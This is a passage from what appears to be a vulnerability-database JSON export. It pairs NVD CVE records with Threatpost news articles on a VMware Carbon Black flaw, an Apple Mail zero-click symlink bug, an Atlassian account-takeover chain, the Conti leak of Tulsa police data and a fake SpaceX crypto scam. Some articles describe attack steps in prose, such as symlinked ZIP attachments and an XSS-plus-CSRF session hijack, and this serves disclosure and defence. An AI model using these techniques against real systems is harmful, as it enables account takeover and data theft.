"HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-23T12:15:00", "type": "cve", "title": "CVE-2021-21999", "cwe": ["CWE-427"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2022-07-12T17:42:00", "cpe": [], "id": "CVE-2021-21999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21999", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-02-09T15:21:33", "description": "Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-10-21T19:15:00", "type": "cve", "title": "CVE-2020-3580", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3580"], "modified": "2022-05-26T15:11:00", "cpe": [], "id": "CVE-2020-3580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-3580", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "threatpost": [{"lastseen": "2021-04-07T21:03:22", "description": "A critical security vulnerability in the VMware Carbon Black Cloud Workload appliance would allow privilege escalation and the ability to take over the administrative rights for the solution.\n\nThe bug (CVE-2021-21982) ranks 9.1 out of 10 on the CVSS vulnerability-severity scale.\n\nThe VMware Carbon Black Cloud Workload platform is designed to provide cybersecurity defense for virtual servers and workloads that are hosted on the VMware\u2019s vSphere platform. vSphere is VMware\u2019s cloud-computing virtualization platform.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe issue in the appliance stems from incorrect URL handling, according to VMware\u2019s advisory issued last week.\n\n\u201cA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication,\u201d the company noted. \u201cAn adversary who has already gained network access to the administrative interface of the appliance may be able to obtain a valid authentication token.\u201d\n\nThat in turn would allow the attacker to access the administration API of the appliance. Once signed in as an admin, the attacker could then view and alter administrative [configuration settings](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/carbonblack_workload/GUID-E2ED3713-315B-4EEE-A3E8-A7A09A011101.html>). Depending on what tools an organization has deployed within the environment, an adversary could carry out a range of attacks, including code execution, disabling security monitoring, enumerating virtual instances within a private cloud and more.\n\n\u201cA remote attacker could exploit this vulnerability to take control of an affected system,\u201d said the Cybersecurity and Infrastructure Agency (CISA) in a [concurrent alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/vmware-releases-security-update>) on the bug.\n\nCompanies are urged to update to the latest version, [version 1.0.2](<https://docs.vmware.com/en/VMware-Carbon-Black-Cloud-Workload/1.0/rn/cbc-workload-102-release-notes.html>), of the VMware Carbon Black Cloud Workload appliance, which contains a fix.\n\nUsers should also limit access to the local administrative interface of the appliance to only those that need it, VMware recommended.\n\nEgor Dimitrenko of Positive Technologies was credited with discovering the vulnerability.\n\nThe security hole is only the latest critical problem that VMware has addressed. In February for instance, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-06T20:55:47", "type": "threatpost", "title": "Critical Bug in VMWare Carbon Black Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T20:55:47", "id": "THREATPOST:98B57FBF6D83FA4D12BEE06C0281FF91", "href": "https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:47:09", "description": "Smart cybercriminals are going after web servers and browsers, more so than after individuals. Unfortunately, these types of attacks often go ignored, as they\u2019re harder to test for (in terms of pen-testing).\n\nWith much of the world now working remotely, this threat has intensified. Attackers use email, instant messages, SMS messages and links on social networking to trick at-home workers into installing malware that leads to identity theft, loss of property and, possibly, entry into the corporate network. Phishing attacks may lead users to fake sites or landing pages, with the same intent.\n\nWhat are the latest risks organizations are facing, and what can be done now to defend against them?\n\n## **Web-Based Phishing On the Rise**\n\nThe cybersecurity industry is seeing a significant spike in web-based phishing, starting with the HTML/phishing cyber-threat family. Similar HTML cousins \u2013 /ScrInject (browser script injection attacks) and /REDIR (browser redirection schemes) \u2013 have also contributed to the increase in phishing attempts in 2020. Web-based malware tends to override or bypass most common antivirus (AV) programs, giving it a greater chance of survival and successful infection.\n\nThis reveals a strong interest from cybercriminals in attacking users where they are often most vulnerable and gullible: browsing the web. The combination of remote work and online shopping expand this threat significantly. Black Friday shoppers last year spent a record-shattering [$9 billion](<https://abcnews.go.com/Business/black-friday-hits-record-report/story?id=74435965>), for instance. With the COVID-19 risk of in-person shopping, 2020\u2019s Cyber Monday was reportedly the largest online sales day ever. Web-based malware can obscure and/or bypass traditional AV products, upping the chance of successful infection.\n\n## **Browsers: A Key Delivery Vector for Malware **\n\nBrowsers are not easy to secure, and web applications can be challenging to monitor. These are some of the reasons why the browser has become a key delivery vector for malware over the last year, and this trend will likely continue for the next year. This corresponds to the documented drop in corporate web traffic, which was generally inspected and sanitized, and the rise in home-based web traffic due to the shift to remote work.\n\nThis shift reinforces the point that cybercriminals have intentionally changed their attack methodologies to target the traffic that is now flooding lesser-secured networks. Malware trends reflect attackers\u2019 intentions and capabilities. Similar to intrusion-prevention system (IPS) detections, malware picked up by security sensors does not always indicate confirmed infections, but rather the weaponization and/or distribution of malicious code. Detections can occur at the network, application and host level on many different devices.\n\n## **What Cybersecurity Actions Should I Take Now?**\n\nThere are three things that organizations need to consider when it comes to their cybersecurity strategy:\n\n 1. **Cyber-hygiene is key:** Organizations must provide remote workers with the knowledge and training necessary to secure their own personal networks and the connected business network. This involves training but also guidance on software updates.\n 2. **Organizations can\u2019t rely on employees\u2019 personal security:** They must also provide additional resources, such as endpoint detection-and-response (EDR) solutions that can detect and stop advanced threats. Organizations need advanced, real-time threat protection for endpoints both pre- and post-infection.\n 3. **Effective cybersecurity necessitates continuous vigilance and adaptability to changing threat strategies:** Though security should have been a top priority all along, now may be the time to consider investing in broader, more advanced, adaptable, and integrated solutions \u2013 particularly as cybercriminals modify their attack methods to use personal devices as a springboard to enterprise networks. With this in mind, fortifying remote systems and networks should top the security to-do list.\n\n## **Staying Well-Equipped**\n\nThe threat landscape shifts constantly, requiring security pros to keep on top of new threat types and vectors. Savvy defenders should note that the browser was a prime delivery vector for malware in 2020 \u2013 and is likely to be again this year \u2013 and act accordingly to ensure consistent controls for remote systems. Regardless of the state of the world around us, the best way to protect against ever-evolving malicious activity is to take a comprehensive, integrated approach to cybersecurity.\n\nVital components of this approach include continuous access to up-to-date threat intelligence and cybersecurity training for all employees, particularly those who work remotely. It\u2019s also essential to use updated security technology, such as EDR, which detects and halts advanced threats in real time. All the intelligence in the world won\u2019t do an organization any good if its security tools aren\u2019t capable of using it to find and mitigate attacks. Make sure all of these tactics are part of your comprehensive security strategy.\n\n**_Aamir Lakhani is a cybersecurity researcher and practitioner for Fortinet\u2019s FortiGuard Labs. _**\n\n_**Enjoy additional insights from Threatpost\u2019s InfoSec Insider community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {}, "published": "2021-04-05T17:28:13", "type": "threatpost", "title": "How To Defend the Extended Network Against Web Risks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-05T17:28:13", "id": "THREATPOST:6C1025257B798335D913F95B63229B76", "href": "https://threatpost.com/how-to-defend-the-extended-network-against-web-risks/165236/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-04-07T16:39:22", "description": "A zero-click security vulnerability in Apple\u2019s macOS Mail would allow a cyberattacker to add or modify any arbitrary file inside Mail\u2019s sandbox environment, leading to a range of attack types.\n\nAccording to Mikko Kentt\u00e4l\u00e4, founder and CEO of SensorFu, exploitation of the bug could lead to unauthorized disclosure of sensitive information to a third party; the ability to modify a victim\u2019s Mail configuration, including mail redirects which enables takeover of victim\u2019s other accounts via password resets; and the ability to change the victim\u2019s configuration so that the attack can propagate to correspondents in a worm-like fashion.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThough the researcher is just now making the bug\u2019s [details available](<https://mikko-kenttala.medium.com/zero-click-vulnerability-in-apples-macos-mail-59e0c14b106c>), it was patched in macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15.5, so users should update accordingly.\n\n## **Unauthorized Write Access**\n\nKentt\u00e4l\u00e4 said he discovered the bug ([CVE-2020-9922](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9922>)) by sending test messages and following Mail process syscalls.\n\nHe found that \u201cmail has a feature which enables it to automatically uncompress attachments which have been automatically compressed by another Mail user,\u201d he explained. \u201cIn the valid use case, if the user creates email and adds the folder as an attachment it will be automatically compressed with ZIP and x-mac-auto-archive=yes; is added to the MIME headers. When another Mail user receives this email, compressed attachment data is automatically uncompressed.\u201d\n\nHowever, the researcher discovered that parts of the uncompressed data are not removed from the temporary directory \u2013 and that the directory serves multiple functions, allowing attackers to pivot within the environment.\n\n\u201c[It] is not unique in context of Mail, this can be leveraged to get unauthorized write access to ~/Library/Mail and to $TMPDIR using symlinks inside of those zipped files,\u201d Kentt\u00e4l\u00e4 explained.\n\n## **Zero-Click Attack Path**\n\nTo exploit the bug, a cyberattacker could email two .ZIP files as attachments to the victim, according to the analysis. When a user receives the email, the Mail app will parse it to find any attachments with x-mac-auto-archive=yes header in place. Mail will then automatically unpack those files.\n\n\u201cThe first .ZIP includes a symlink named Mail which points to victims\u2019 $HOME/Library/Mail and file 1.txt,\u201d said Kentt\u00e4l\u00e4. \u201cThe .ZIP gets uncompressed to $TMPDIR/com.apple.mail/bom/. Based on the filename=1.txt.zip header, 1.txt gets copied to the mail director and everything works as expected. However, cleanup is not done right way and the symlink is left in place.\u201d\n\nThis left-behind symlink anchors the second stage of the attack.\n\n\u201cThe second attached .ZIP includes the changes that you want to do to $HOME/Library/Mail. This will provide arbitrary file write permission to Library/Mail,\u201d the researcher explained. \u201cIn my example case I wrote new Mail rules for the Mail application. With that you can add an auto forward rule to the victim\u2019s Mail application.\u201d\n\nThis arbitrary write access means that an attacker can manipulate all of the files in $HOME/Library/Mail, he added.\n\nCVE-2020-9922 is rated 6.5 on the CVSS vulnerability-severity scale, making it medium-severity, but the researcher stressed that successful exploitation could \u201clead to many bad things.\u201d\n\n\u201cAs shown, this will lead to exposure of the sensitive data to a third party through manipulating the Mail application\u2019s configuration,\u201d he said. \u201cOne of the available configuration options is the user\u2019s signature which could be used to make this vulnerability wormable. There is also a chance that this could lead to a remote code-execution (RCE) vulnerability, but I didn\u2019t go that far.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-05T19:10:53", "type": "threatpost", "title": "Apple Mail Zero-Click Security Vulnerability Allows Email Snooping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-9922", "CVE-2021-21982"], "modified": "2021-04-05T19:10:53", "id": "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "href": "https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-06-25T16:18:42", "description": "Atlassian, a platform used by 180,000 customers to engineer software and manage projects, could have been hijacked with a single click due to security flaws, researchers have disclosed.\n\nOn Thursday, Check Point Research (CPR) published a report ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)) outlining how an attacker could have exploited the bugs to access Atlassian\u2019s Jira: A proprietary bug-tracking and agile project-management tool. Jira counts some heavyweights among its fan base: The software-development tool is used by more than 65,000 customers, including the likes of the Apache Software Foundation, Cisco, Fedora Commons, Hibernate, Pfizer and Visa.\n\nCPR researchers said that with just one click, an attacker could have siphoned sensitive information out of Jira.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCPR researcher Roman Zaikin, author of the report, told Threatpost that the main issue is with the Atlassian platform: The team \u201cfound multiple vulnerabilities and chained them in order to find this bug,\u201d he said. As far as what sensitive information could have been drained out of the platform, Zaikin said it would have included \u201canything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n\nThe flaws could have also enabled an attacker to take over accounts and to control some of Atlassian\u2019s applications, including Jira and Confluence, a web-based corporate wiki that comes with a built-in Tomcat web server and hsql database, and which also supports other databases. More than 60,000 customers use Confluence, including LinkedIn, NASA and the New York Times.\n\n## SolarWinds-esque Supply-Chain Attack\n\nWith that level of control over Atlassian, one imagines a potential exploit that would have been similar to the [SolarWinds](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) supply-chain attack, in which attackers used a default password as an open door into a software-updating mechanism.\n\nThe threat actors in that far-ranging campaign [were able to use SolarWinds\u2019 Orion network management platform](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) to infect targets by pushing out a custom backdoor called Sunburst via trojanized product updates. Far-ranging is actually an understatement: The supply-chain attack succeeded in [compromising](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) the head of the Department of Homeland Security (DHS) under former president Trump, other top-ranking members of the department\u2019s cybersecurity staff, numerous large enterprises and other U.S. government agencies.\n\nOf note, Orion is an infrastructure monitoring and management tool that sits in a network sweet spot, where it reaches other assets and thus makes [an ideal base camp](<https://threatpost.com/solarwinds-hack-seismic-shift/165758/>) for an attacker to carry out other malicious activities.\n\nIn fact, it was the SolarWinds catastrophe that inspired CPR to investigate Atlassian n the first place: Researchers said that they grew curious about supply-chain attacks following the incident.\n\nIn the course of its investigation, CPR managed to bypass Atlassian\u2019s security measures, \u201cproving that an attacker could have injected malicious code, performed actions on behalf of users and hijacked user sessions,\u201d CPR researchers wrote.\n\nThey noted that Bitbucket, a Git-based source code repository hosting service, could also have played a part in a supply-chain attack to target Atlassian partners and customers. The vulnerability affected several Atlassian-maintained websites that support customers and partners but doesn\u2019t affect Atlassian cloud-based or on-prem products.\n\nOded Vanunu, head of products vulnerabilities research at CPR, was quoted in a release as saying that supply chain attacks \u201chave piqued our interest all year, ever since the SolarWinds incident.\u201d He noted that Atlassian platforms are \u201ccentral to an organization\u2019s workflow.\u201d\n\n\u201cAn incredible amount of supply-chain information flows through these applications, as well as engineering and project management,\u201d Vanunu continued. \u201cHence, we began asking a somewhat provocative question: What information could a malicious user get if they accessed a Jira or a Confluence account?\u201d\n\n## Account Takeover\n\nThe answer: A lot of sensitive information. In its investigations, CPR achieved account takeover on Atlassian accounts accessible by subdomains under [atlassian.com](<http://atlassian.com/>). These are the subdomains that researchers found to be vulnerable:\n\n * [jira.atlassian.com](<http://jira.atlassian.com/>)\n * [confluence.atlassian.com](<http://confluence.atlassian.com/>)\n * [getsupport.atlassian.com](<http://getsupport.atlassian.com/>)\n * [partners.atlassian.com](<http://partners.atlassian.com/>)\n * [developer.atlassian.com](<http://developer.atlassian.com/>)\n * [support.atlassian.com](<http://support.atlassian.com/>)\n * [training.atlassian.com](<http://training.atlassian.com/>)\n\nThe bugs would have enabled an attacker to pull off a laundry list of malicious activities, such as cross-site scripting ([XSS](<https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/>)) attacks; cross-site request forgery ([CSRF](<https://threatpost.com/paypal-fixes-csrf-vulnerability-in-paypal-me/119435/>)) attacks; or [session fixation](<https://threatpost.com/session-fixation-forgotten-vulnerability-081710/74340/>) attacks.\n\n\u201cIn other words, an attacker could use the security flaws found by CPR to take control over a victim\u2019s account, perform actions on behalf of him, and gain access to Jira tickets,\u201d the researchers noted. \u201cFurthermore, an attacker could have edited a company\u2019s Confluence wiki, or [viewed] tickets at GetSupport. The attacker could have gone on to gain personal information. All of this could be accomplished in just one click.\u201d\n\nExploiting Atlassian required, first off, finding a way to inject code into Atlassian. Researchers did so via a XSS vulnerability on the subdomain \u201ctraining.atlassian.com,\u201d which offers users courses or credits. When the item type is \u201ctraining_credit,\u201d an additional parameter called \u201coptions._training_credit_account\u201d is added, to request a parameter that was vulnerable to XSS.\n\nThe Content Security Policy (CSP) was configured \u201cpoorly\u201d on this subdomain, the researchers explained, with \u201cunsafe-inline\u201d and \u201cunsafe-eval\u201d directives, which allows script execution. This made the subdomain \u201ca perfect starting point\u201d for research, they said. They were able to exploit the XSS bug to snag all the cookies and the local storage of the target.\n\nNext, since the stored XSS could only be run when adding items to the shopping cart, the researchers attempted to see if they could make a user add a malicious item without the user\u2019s notice. Given that there was no CSRF token, they could perform a CSRF attack on the shopping list and execute their payload. To do so, they uploaded a proof of concept and sent it to the would-be victim. Because that payload was stored XSS, it was stored in the database and added to the Shopping List, and their malicious item was added to the shopping cart.\n\nThe researchers used this code injection to add a new session cookie to the user\u2019s account, and, in combination with a session-fixation vulnerability in Atlassian domains, they managed to take over accounts.\n\n## Attack Methodology\n\nA successful attack chain would have entailed these steps:\n\n 1. Attacker lures victim into clicking on a crafted link (coming from the \u201cAtlassian\u201d domain), either from social media, a fake email or messaging app, etc.\n 2. By clicking on the link, the payload sends a request on behalf of the victim to the Atlassian platform, which would have performed the attack and stolen the user session.\n 3. Attacker logs onto victim\u2019s Atlassian apps associated with the account, gaining all the sensitive information stored therein.\n\nCPR disclosed its research findings to Atlassian on Jan. 8. According to CPR researchers, Atlassian said it deployed a patch on May 18.\n\n\u201cIn a world where distributed workforces increasingly depend on remote technologies, it\u2019s imperative to ensure these technologies have the best defenses against malicious data extraction,\u201d Vanunu concluded. \u201cWe hope our latest research will help organizations to raise the awareness on supply-chain attacks.\u201d\n\n062421 09:16 UPDATE: An Atlassian spokesperson sent this statement to Threatpost: \u201cBased on our investigation, the vulnerabilities outlined impact a limited set of Atlassian-owned web applications as well as a third-party training platform. Atlassian has shipped patches to address these issues and none of these vulnerabilities affected Atlassian Cloud (like Jira or Confluence Cloud) or on-premise products (like Jira Server or Confluence Server).\u201d\n\n062421 14:24 UPDATE 2: Added clarifying input from CPR researcher Roman Zaikin regarding what kind of information attackers could have been drained from the Atlassian platform.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. **\n", "cvss3": {}, "published": "2021-06-24T10:00:47", "type": "threatpost", "title": "Atlassian Bugs Could Have Led to 1-Click Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T10:00:47", "id": "THREATPOST:A2AB7D9E07DE88E79BA713CE497B0784", "href": "https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T16:21:06", "description": "The city of Tulsa, OK is asking some of its residents to keep a close eye on their personal and financial accounts after the Conti ransomware group leaked some 18,000 city files, mostly police citations, on the dark web.\n\nThe leak stemmed from a [May 6 ransomware attack](<https://www.cityoftulsa.org/press-room/city-of-tulsa-ransomware-update-may-20/>) that caused the city to shut down its network, disrupting its online bill payment systems, utility billing and email. The websites for the city, the Tulsa City Council, the city\u2019s police force and Tulsa 311 also were affected in the attack.\n\nBleepingComputer published [a report](<https://www.bleepingcomputer.com/news/security/tulsa-warns-of-data-breach-after-conti-ransomware-leaks-police-citations/>) Wednesday that includes what is purported to be a screenshot of the list of 18,938 files from the city of Tulsa leaked by Conti, which, in addition to police citations, also include internal Word documents.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nPolice citations contain some personal identifiable information (PII) \u2013 such as name, date of birth, address and driver\u2019s license number \u2013 but do not include Social Security numbers, according to a [statement by the city](<https://www.cityoftulsa.org/press-room/ransomware-update-june-22-tulsa-police-citations-posted-on-dark-web-tulsa-residents-should-take-necessary-precautions/>) advising people of the leak.\n\n\u201cOut of an abundance of caution, anyone who has filed a police report, received a police citation, made a payment with the City, or interacted with the City in any way where PII was shared, whether online, in-person or on paper, prior to May 2021, is being asked to take monitoring precautions,\u201d according to the statement.\n\nSome of the ways those potentially affected by the leak can mitigate any potential fallout include monitoring financial accounts and credit reports, asking credit/debit card companies to issue a fraud alert, changing passwords to personal accounts, and adding a second level of authentication to personal accounts and apps, the City advised.\n\n## **Criminalizing the Data**\n\nIndeed, while the information leaked \u201cmay not seem immediately useful to cybercriminals,\u201d it can be used to craft attacks that leverage social engineering to lure victims, such as phishing emails or other scams, said one security expert.\n\n\u201cIn this instance, the disclosure of police records can be used to construct convincing stories to trick unsuspecting victims or their families into paying fake fees or fines by claiming to be lawyers or court representatives,\u201d Chris Clements, vice president of solutions architecture for Cerberus Sentinel**, **said in an email to Threatpost. \u201cEven normally scam-savvy people may be fooled if a fraudster has enough detailed information.\u201d\n\nThe leak also shows the Conti Gang once again flexing its muscles. \u201cOne of the most prolific ransomware gangs in operation,\u201d the group of late has been \u201cruthless in its attacks on the public sector and [healthcare networks](<https://threatpost.com/conti-ransomware-fail-costly/166263/>),\u201d even as authorities are aggressively cracking down on and in some cases shutting down other ransomware perpetrators, another security expert observed.\n\n\u201cThe Conti group is showing a blatant disregard for the authority of law enforcement as they continue their attacks on these vital services,\u201d Erich Kron, security awareness advocate for KnowBe4, said in an email to Threatpost.** \u201c**Even after the shutdown of the DarkSide gang, the arrests in the takedown of the Clop group, and even in light of the Ziggy ransomware gang providing all of their encryption keys for victims due to the fear of law enforcement actions, Conti continues their attacks without skipping a beat.\u201d\n\nIndeed, the DarkSide gang, infamous for the [massively disruptive attack](<https://threatpost.com/pipeline-crippled-ransomware/165963/>) on the Colonial Pipeline Co, in May [suffered a loss in access](<https://threatpost.com/darksides-servers-shutdown/166187/>) to the public part of its infrastructure \u2013 including the servers for its blog, payment processing and denial-of-service (DoS) operations \u2013 due to its seizure by law enforcement.\n\nOn the heels of that cybercriminal setback, authorities in the Ukraine also took down the Clop ransomware gang in a raid in Kiev that included the arrests of six people, as well as the seizure of $185,000 in cash, a Tesla, a Mercedes and their computer equipment.\n\nMeanwhile, the Conti Gang, which has been known to demand [outrageous extortion fees](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>) from its victims for releasing files from encryption, remains unscathed and operational \u2013 for now.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. **\n", "cvss3": {}, "published": "2021-06-24T13:14:56", "type": "threatpost", "title": "Tulsa\u2019s Police-Citation Data Leaked by Conti Gang", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T13:14:56", "id": "THREATPOST:918D372641AFC01D7D36FE88D08ACA6E", "href": "https://threatpost.com/tulsa-police-data-leaked-conti-ransomware/167220/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T16:26:42", "description": "YouTube fans have been swindled out of almost $1 million (and counting) thanks to an extremely convincing fake SpaceX crypto-coin campaign that uses a popular decentralized finance protocol called Uniswap.\n\nThe scam is rearing its Elon-Musk-themed head in ads on YouTube that show up before and after videos about cryptocurrency, according to research from Tenable. So far, the scammers have earned more than $430,000 so far across two completed campaigns, with a third still running that is on pace to bring the total \u201cearnings\u201d up to $1 million, the firm said.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe reason this particular campaign stands out is that it didn\u2019t rely on promotion through Telegram channels or social media, but it rode the wave of success scammers have found through YouTube,\u201d explained Satnam Narang, researcher at Tenable, in a [blog posting](<https://www.tenable.com/blog/elon-musk-youtube-advertising-scams-fake-spacex-coin-promoted-during-cryptocurrency-videos>) on Thursday. \u201cIt did so by leveraging the existing infrastructure of YouTube Ads to identify their target demographic of cryptocurrency enthusiasts and get their ads in front of thousands of viewers. Many new cryptocurrency investors look to YouTube channels for news and guidance, so it\u2019s an ideal channel for promoting a fake coin.\u201d\n\n## **Elon Musk: To Mars and Beyond**\n\nThe ads have been running since the end of May, according to the analysis. Each of them are around three to five minutes long, and all follow the same format: There\u2019s a fake tweet at the top from SpaceX and Tesla founder Musk that claims he\u2019s launching his own cryptocurrency, called $SpaceX.\n\nThe ad goes on to say that \u201cElon Musk is launching his own cryptocurrency, $SpaceX,\u201d in a bid to purportedly \u201ctake everyone to Mars and make human life possible there.\u201d To sweeten the pot, the ads then note that for each transaction involving the $SpaceX coin, a donation will be made \u201ctowards space-research companies\u201d in order to \u201chelp Elon\u2019s mission.\u201d\n\n\n\nThe YouTube ad for $SpaceX cryptocurrency.\n\nMeanwhile, an embedded video plays featuring various random clips of Musk interviews, including one for the Computer History Museum and KQED\u2019s \u201cRevolutionaries\u201d from 2013.\n\nIf someone is duped into following up on the promises of the ads, the next part of the campaign begins, by asking victims to visit one of at least a dozen purpose-built $SpaceX coin sites.\n\n\u201cThe YouTube ads themselves do not contain a direct link to a website. Instead, they advertise the website in another section of the template,\u201d explained Narang.\n\nThe websites include URLs like \u201cbuyspacex.com,\u201d \u201cmissionspx.com\u201d and \u201cmuskspx.com,\u201d among many others.\n\nThe ad space was purchased legitimately from YouTube, and 